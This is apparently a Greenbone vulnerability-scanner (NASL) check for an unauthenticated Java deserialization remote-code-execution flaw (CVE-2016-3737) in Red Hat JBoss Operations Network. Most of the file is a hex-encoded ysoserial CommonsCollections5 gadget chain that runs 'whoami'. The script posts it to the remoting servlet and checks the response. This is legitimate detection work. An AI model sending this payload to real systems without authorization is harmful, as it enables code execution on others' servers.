Red Hat JBoss Operations Network (JON) < 3.3.6 Deserialization RCE Vulnerability

# SPDX-FileCopyrightText: 2016 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:redhat:jboss_operations_network";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.105832");
  script_cve_id("CVE-2016-3737");
  script_tag(name:"cvss_base", value:"9.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:C");
  script_version("2024-06-28T05:05:33+0000");

  script_name("Red Hat JBoss Operations Network (JON) < 3.3.6 Deserialization RCE Vulnerability");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/90430");
  script_xref(name:"URL", value:"https://access.redhat.com/security/cve/cve-2016-3737");

  script_tag(name:"impact", value:"Exploiting this issue will allow attackers to execute arbitrary
  code within the context of the affected application.");

  script_tag(name:"vuldetect", value:"Sends a special crafted java object via a HTTP POST request
  and checks the response.");

  script_tag(name:"insight", value:"It was discovered that sending specially crafted HTTP request to
  the JON server would allow deserialization of that message without authentication. An attacker
  could use this flaw to cause remote code execution.");

  script_tag(name:"solution", value:"Updates are available. Please see the references or vendor
  advisory for more information.");

  script_tag(name:"summary", value:"Red Hat JBoss Operations Network (JON) is prone to a remote code
  execution (RCE) vulnerability.");

  script_tag(name:"affected", value:"Red Hat JON before version 3.3.6. Other versions and/or
  deployment variants are affected as well.");

  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"qod_type", value:"remote_active");

  script_tag(name:"last_modification", value:"2024-06-28 05:05:33 +0000 (Fri, 28 Jun 2024)");
  script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2017-11-03 01:29:00 +0000 (Fri, 03 Nov 2017)");
  script_tag(name:"creation_date", value:"2016-07-28 15:24:48 +0200 (Thu, 28 Jul 2016)");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2016 Greenbone AG");
  script_dependencies("gb_jboss_on_detect.nasl");
  script_require_ports("Services/www", 7080);
  script_mandatory_keys("jboss_on/installed");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
include("host_details.inc");

if( ! port = get_app_port( cpe:CPE, service:"www" ) )
  exit( 0 );

if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
  exit( 0 );

#java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 "whoami"
payload = raw_string(
0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x2e,0x6a,0x61,0x76,0x61,0x78,0x2e,0x6d,0x61,
0x6e,0x61,0x67,0x65,0x6d,0x65,0x6e,0x74,0x2e,0x42,0x61,0x64,0x41,0x74,0x74,0x72,
0x69,0x62,0x75,0x74,0x65,0x56,0x61,0x6c,0x75,0x65,0x45,0x78,0x70,0x45,0x78,0x63,
0x65,0x70,0x74,0x69,0x6f,0x6e,0xd4,0xe7,0xda,0xab,0x63,0x2d,0x46,0x40,0x02,0x00,
0x01,0x4c,0x00,0x03,0x76,0x61,0x6c,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,
0x6c,0x61,0x6e,0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x78,0x72,0x00,0x13,
0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x45,0x78,0x63,0x65,0x70,0x74,
0x69,0x6f,0x6e,0xd0,0xfd,0x1f,0x3e,0x1a,0x3b,0x1c,0xc4,0x02,0x00,0x00,0x78,0x72,
0x00,0x13,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x54,0x68,0x72,0x6f,
0x77,0x61,0x62,0x6c,0x65,0xd5,0xc6,0x35,0x27,0x39,0x77,0xb8,0xcb,0x03,0x00,0x04,
0x4c,0x00,0x05,0x63,0x61,0x75,0x73,0x65,0x74,0x00,0x15,0x4c,0x6a,0x61,0x76,0x61,
0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x54,0x68,0x72,0x6f,0x77,0x61,0x62,0x6c,0x65,0x3b,
0x4c,0x00,0x0d,0x64,0x65,0x74,0x61,0x69,0x6c,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,
0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,
0x72,0x69,0x6e,0x67,0x3b,0x5b,0x00,0x0a,0x73,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,
0x63,0x65,0x74,0x00,0x1e,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,
0x2f,0x53,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x45,0x6c,0x65,0x6d,0x65,
0x6e,0x74,0x3b,0x4c,0x00,0x14,0x73,0x75,0x70,0x70,0x72,0x65,0x73,0x73,0x65,0x64,
0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x73,0x74,0x00,0x10,0x4c,0x6a,0x61,
0x76,0x61,0x2f,0x75,0x74,0x69,0x6c,0x2f,0x4c,0x69,0x73,0x74,0x3b,0x78,0x70,0x71,
0x00,0x7e,0x00,0x08,0x70,0x75,0x72,0x00,0x1e,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,
0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x45,
0x6c,0x65,0x6d,0x65,0x6e,0x74,0x3b,0x02,0x46,0x2a,0x3c,0x3c,0xfd,0x22,0x39,0x02,
0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x03,0x73,0x72,0x00,0x1b,0x6a,0x61,0x76,0x61,
0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,
0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x61,0x09,0xc5,0x9a,0x26,0x36,0xdd,0x85,0x02,
0x00,0x04,0x49,0x00,0x0a,0x6c,0x69,0x6e,0x65,0x4e,0x75,0x6d,0x62,0x65,0x72,0x4c,
0x00,0x0e,0x64,0x65,0x63,0x6c,0x61,0x72,0x69,0x6e,0x67,0x43,0x6c,0x61,0x73,0x73,
0x71,0x00,0x7e,0x00,0x05,0x4c,0x00,0x08,0x66,0x69,0x6c,0x65,0x4e,0x61,0x6d,0x65,
0x71,0x00,0x7e,0x00,0x05,0x4c,0x00,0x0a,0x6d,0x65,0x74,0x68,0x6f,0x64,0x4e,0x61,
0x6d,0x65,0x71,0x00,0x7e,0x00,0x05,0x78,0x70,0x00,0x00,0x00,0x4a,0x74,0x00,0x26,
0x79,0x73,0x6f,0x73,0x65,0x72,0x69,0x61,0x6c,0x2e,0x70,0x61,0x79,0x6c,0x6f,0x61,
0x64,0x73,0x2e,0x43,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x43,0x6f,0x6c,0x6c,0x65,0x63,
0x74,0x69,0x6f,0x6e,0x73,0x35,0x74,0x00,0x18,0x43,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,
0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x35,0x2e,0x6a,0x61,0x76,
0x61,0x74,0x00,0x09,0x67,0x65,0x74,0x4f,0x62,0x6a,0x65,0x63,0x74,0x73,0x71,0x00,
0x7e,0x00,0x0b,0x00,0x00,0x00,0x2d,0x71,0x00,0x7e,0x00,0x0d,0x71,0x00,0x7e,0x00,
0x0e,0x71,0x00,0x7e,0x00,0x0f,0x73,0x71,0x00,0x7e,0x00,0x0b,0x00,0x00,0x00,0x26,
0x74,0x00,0x19,0x79,0x73,0x6f,0x73,0x65,0x72,0x69,0x61,0x6c,0x2e,0x47,0x65,0x6e,
0x65,0x72,0x61,0x74,0x65,0x50,0x61,0x79,0x6c,0x6f,0x61,0x64,0x74,0x00,0x14,0x47,
0x65,0x6e,0x65,0x72,0x61,0x74,0x65,0x50,0x61,0x79,0x6c,0x6f,0x61,0x64,0x2e,0x6a,
0x61,0x76,0x61,0x74,0x00,0x04,0x6d,0x61,0x69,0x6e,0x73,0x72,0x00,0x26,0x6a,0x61,
0x76,0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,
0x6f,0x6e,0x73,0x24,0x55,0x6e,0x6d,0x6f,0x64,0x69,0x66,0x69,0x61,0x62,0x6c,0x65,
0x4c,0x69,0x73,0x74,0xfc,0x0f,0x25,0x31,0xb5,0xec,0x8e,0x10,0x02,0x00,0x01,0x4c,
0x00,0x04,0x6c,0x69,0x73,0x74,0x71,0x00,0x7e,0x00,0x07,0x78,0x72,0x00,0x2c,0x6a,
0x61,0x76,0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,
0x69,0x6f,0x6e,0x73,0x24,0x55,0x6e,0x6d,0x6f,0x64,0x69,0x66,0x69,0x61,0x62,0x6c,
0x65,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x19,0x42,0x00,0x80,0xcb,
0x5e,0xf7,0x1e,0x02,0x00,0x01,0x4c,0x00,0x01,0x63,0x74,0x00,0x16,0x4c,0x6a,0x61,
0x76,0x61,0x2f,0x75,0x74,0x69,0x6c,0x2f,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,
0x6f,0x6e,0x3b,0x78,0x70,0x73,0x72,0x00,0x13,0x6a,0x61,0x76,0x61,0x2e,0x75,0x74,
0x69,0x6c,0x2e,0x41,0x72,0x72,0x61,0x79,0x4c,0x69,0x73,0x74,0x78,0x81,0xd2,0x1d,
0x99,0xc7,0x61,0x9d,0x03,0x00,0x01,0x49,0x00,0x04,0x73,0x69,0x7a,0x65,0x78,0x70,
0x00,0x00,0x00,0x00,0x77,0x04,0x00,0x00,0x00,0x00,0x78,0x71,0x00,0x7e,0x00,0x1a,
0x78,0x73,0x72,0x00,0x34,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,0x2e,
0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,
0x6f,0x6e,0x73,0x2e,0x6b,0x65,0x79,0x76,0x61,0x6c,0x75,0x65,0x2e,0x54,0x69,0x65,
0x64,0x4d,0x61,0x70,0x45,0x6e,0x74,0x72,0x79,0x8a,0xad,0xd2,0x9b,0x39,0xc1,0x1f,
0xdb,0x02,0x00,0x02,0x4c,0x00,0x03,0x6b,0x65,0x79,0x71,0x00,0x7e,0x00,0x01,0x4c,
0x00,0x03,0x6d,0x61,0x70,0x74,0x00,0x0f,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,
0x69,0x6c,0x2f,0x4d,0x61,0x70,0x3b,0x78,0x70,0x74,0x00,0x03,0x66,0x6f,0x6f,0x73,
0x72,0x00,0x2a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,0x2e,0x63,0x6f,
0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,
0x73,0x2e,0x6d,0x61,0x70,0x2e,0x4c,0x61,0x7a,0x79,0x4d,0x61,0x70,0x6e,0xe5,0x94,
0x82,0x9e,0x79,0x10,0x94,0x03,0x00,0x01,0x4c,0x00,0x07,0x66,0x61,0x63,0x74,0x6f,
0x72,0x79,0x74,0x00,0x2c,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,0x63,0x68,0x65,
0x2f,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,
0x69,0x6f,0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,
0x3b,0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,
0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,
0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x43,
0x68,0x61,0x69,0x6e,0x65,0x64,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,
0x72,0x30,0xc7,0x97,0xec,0x28,0x7a,0x97,0x04,0x02,0x00,0x01,0x5b,0x00,0x0d,0x69,
0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x73,0x74,0x00,0x2d,0x5b,
0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,0x63,0x68,0x65,0x2f,0x63,0x6f,0x6d,0x6d,
0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2f,
0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x3b,0x78,0x70,0x75,0x72,
0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,0x2e,0x63,
0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,
0x6e,0x73,0x2e,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x3b,0xbd,
0x56,0x2a,0xf1,0xd8,0x34,0x18,0x99,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x05,
0x73,0x72,0x00,0x3b,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,0x2e,0x63,
0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,
0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x43,0x6f,0x6e,0x73,
0x74,0x61,0x6e,0x74,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x58,
0x76,0x90,0x11,0x41,0x02,0xb1,0x94,0x02,0x00,0x01,0x4c,0x00,0x09,0x69,0x43,0x6f,
0x6e,0x73,0x74,0x61,0x6e,0x74,0x71,0x00,0x7e,0x00,0x01,0x78,0x70,0x76,0x72,0x00,
0x11,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x52,0x75,0x6e,0x74,0x69,
0x6d,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x73,
0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,0x2e,0x63,0x6f,
0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,
0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x49,0x6e,0x76,0x6f,0x6b,
0x65,0x72,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x87,0xe8,0xff,
0x6b,0x7b,0x7c,0xce,0x38,0x02,0x00,0x03,0x5b,0x00,0x05,0x69,0x41,0x72,0x67,0x73,
0x74,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x4f,
0x62,0x6a,0x65,0x63,0x74,0x3b,0x4c,0x00,0x0b,0x69,0x4d,0x65,0x74,0x68,0x6f,0x64,
0x4e,0x61,0x6d,0x65,0x71,0x00,0x7e,0x00,0x05,0x5b,0x00,0x0b,0x69,0x50,0x61,0x72,
0x61,0x6d,0x54,0x79,0x70,0x65,0x73,0x74,0x00,0x12,0x5b,0x4c,0x6a,0x61,0x76,0x61,
0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,0x3b,0x78,0x70,0x75,0x72,
0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,
0x6a,0x65,0x63,0x74,0x3b,0x90,0xce,0x58,0x9f,0x10,0x73,0x29,0x6c,0x02,0x00,0x00,
0x78,0x70,0x00,0x00,0x00,0x02,0x74,0x00,0x0a,0x67,0x65,0x74,0x52,0x75,0x6e,0x74,
0x69,0x6d,0x65,0x75,0x72,0x00,0x12,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,
0x6e,0x67,0x2e,0x43,0x6c,0x61,0x73,0x73,0x3b,0xab,0x16,0xd7,0xae,0xcb,0xcd,0x5a,
0x99,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x00,0x74,0x00,0x09,0x67,0x65,0x74,
0x4d,0x65,0x74,0x68,0x6f,0x64,0x75,0x71,0x00,0x7e,0x00,0x32,0x00,0x00,0x00,0x02,
0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,
0x72,0x69,0x6e,0x67,0xa0,0xf0,0xa4,0x38,0x7a,0x3b,0xb3,0x42,0x02,0x00,0x00,0x78,
0x70,0x76,0x71,0x00,0x7e,0x00,0x32,0x73,0x71,0x00,0x7e,0x00,0x2b,0x75,0x71,0x00,
0x7e,0x00,0x2f,0x00,0x00,0x00,0x02,0x70,0x75,0x71,0x00,0x7e,0x00,0x2f,0x00,0x00,
0x00,0x00,0x74,0x00,0x06,0x69,0x6e,0x76,0x6f,0x6b,0x65,0x75,0x71,0x00,0x7e,0x00,
0x32,0x00,0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,
0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x2f,0x73,0x71,0x00,0x7e,
0x00,0x2b,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,
0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0xad,0xd2,0x56,0xe7,0xe9,0x1d,0x7b,
0x47,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00,0x06,0x77,0x68,0x6f,
0x61,0x6d,0x69,0x74,0x00,0x04,0x65,0x78,0x65,0x63,0x75,0x71,0x00,0x7e,0x00,0x32,
0x00,0x00,0x00,0x01,0x71,0x00,0x7e,0x00,0x37,0x73,0x71,0x00,0x7e,0x00,0x27,0x73,
0x72,0x00,0x11,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x49,0x6e,0x74,
0x65,0x67,0x65,0x72,0x12,0xe2,0xa0,0xa4,0xf7,0x81,0x87,0x38,0x02,0x00,0x01,0x49,
0x00,0x05,0x76,0x61,0x6c,0x75,0x65,0x78,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,
0x6c,0x61,0x6e,0x67,0x2e,0x4e,0x75,0x6d,0x62,0x65,0x72,0x86,0xac,0x95,0x1d,0x0b,
0x94,0xe0,0x8b,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x73,0x72,0x00,0x11,
0x6a,0x61,0x76,0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x48,0x61,0x73,0x68,0x4d,0x61,
0x70,0x05,0x07,0xda,0xc1,0xc3,0x16,0x60,0xd1,0x03,0x00,0x02,0x46,0x00,0x0a,0x6c,
0x6f,0x61,0x64,0x46,0x61,0x63,0x74,0x6f,0x72,0x49,0x00,0x09,0x74,0x68,0x72,0x65,
0x73,0x68,0x6f,0x6c,0x64,0x78,0x70,0x3f,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x77,
0x08,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x78,0x78);

req = http_post_put_req( port:port, data:payload,
                         url:"/jboss-remoting-servlet-invoker/ServerInvokerServlet/?generalizeSocketException=true",
                         add_headers:make_array( "Content-Type", "application/octet-stream", "JBoss-Remoting-Version", "22" ) );

buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );

if( "javax.management.BadAttributeValueExpException cannot be cast to" >< buf ) {
  report = 'It was possible to execute a command on the remote host by sending a special crafted java object.\n';
  report += http_report_vuln_url( port:port, url:"/jboss-remoting-servlet-invoker/ServerInvokerServlet/?generalizeSocketException=true" );
  security_message( port:port, data:report );
  exit( 0 );
}

exit( 99 );